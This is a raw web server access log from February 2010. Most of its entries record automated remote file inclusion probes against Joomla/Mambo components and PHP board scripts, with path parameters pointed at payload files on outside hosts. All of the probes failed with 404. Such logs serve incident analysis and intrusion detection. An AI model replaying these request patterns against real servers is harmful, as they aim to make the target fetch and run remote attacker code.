81.176.226.164 - - [07/Feb/2010:08:12:35 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:12:35 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:08:12:45 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:08:12:45 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:08:12:45 -0800] "GET /logs/access_100113.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:13:15 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:13:15 -0800] "GET /logs/access_100109.log%20%20//agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:13:15 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:08:13:15 -0800] "GET /logs/access_100108.log%20%20//agendax/addevent.inc.php?agendax_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:08:13:21 -0800] "GET /logs/access_100125.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zxl.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:08:13:27 -0800] "GET /logs/access_100119.log///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:14:21 -0800] "GET //delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:14:21 -0800] "GET /logs/access_100126.log%20%20///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:24 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:24 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:24 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:14:24 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:27 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:27 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:14:27 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:14:30 -0800] "GET /logs/access_100121.log%20%20///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:08:15:38 -0800] "GET /ideal/forum/viewtopic.php?p=6068 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:08:15:38 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/ideal/forum/viewtopic.php?p=6068" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:15:41 -0800] "GET //delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:15:41 -0800] "GET /logs/access_100126.log///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:15:41 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:16:12 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:16:12 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:16:12 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:16:19 -0800] "GET /logs/access_100131.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:16:34 -0800] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:16:35 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:16:35 -0800] "GET /logs/access_100127.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:16:56 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:16:56 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:16:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:16:57 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:16:59 -0800] "GET /logs/access_100121.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:17:02 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:17:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:17:02 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:17:05 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:17:16 -0800] "GET /logs/access_100106.log%20%20//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:14 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:19:26 -0800] "GET /components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:19:26 -0800] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:19:26 -0800] "GET /logs/access_100127.log//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:19:42 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:20:00 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:20:01 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:20:03 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:20:03 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:07 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:07 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:11 -0800] "GET /logs/access_100120.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:16 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:18 -0800] "GET /logs/access_100120.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:18 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:18 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:20:22 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [07/Feb/2010:08:20:27 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:08:20:41 -0800] "GET /logs/access_100106.log//components/com_mambowiki/MamboLogin.php?IP=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:22:03 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:22:48 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:22:53 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:22:53 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:22:53 -0800] "GET /logs/access_100103.log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:22:53 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:22:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:08:22:58 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:23:00 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:23:00 -0800] "GET //write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
210.127.209.105 - - [07/Feb/2010:08:23:01 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:23:01 -0800] "GET /logs///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
210.127.209.105 - - [07/Feb/2010:08:23:02 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [07/Feb/2010:08:23:04 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:12 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:12 -0800] "GET /logs/access_100103.log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:12 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:17 -0800] "GET /logs/access_100126.log///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:17 -0800] "GET //delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:17 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:40 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:40 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:08:23:40 -0800] "GET /logs/access_100103.log/////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:24:11 -0800] "GET /logs/access_100119.log///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:24:16 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:24:16 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:24:16 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:24:51 -0800] "GET /logs/access_100131.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:51 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:51 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:51 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:52 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:52 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:08:24:52 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:25:03 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:25:03 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:25:04 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:08:25:11 -0800] "GET /logs/access_100131.log%20%20//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [07/Feb/2010:08:25:20 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [07/Feb/2010:08:25:51 -0800] "GET /cam/ HTTP/1.0" 200 733 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
70.38.54.250 - - [07/Feb/2010:08:25:56 -0800] "GET /citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:25:57 -0800] "GET /logs/access_100116.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
70.38.54.250 - - [07/Feb/2010:08:26:25 -0800] "GET /logs/access_100105.log//citywriter/head.php?path=http://www.lvanj.org/government/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
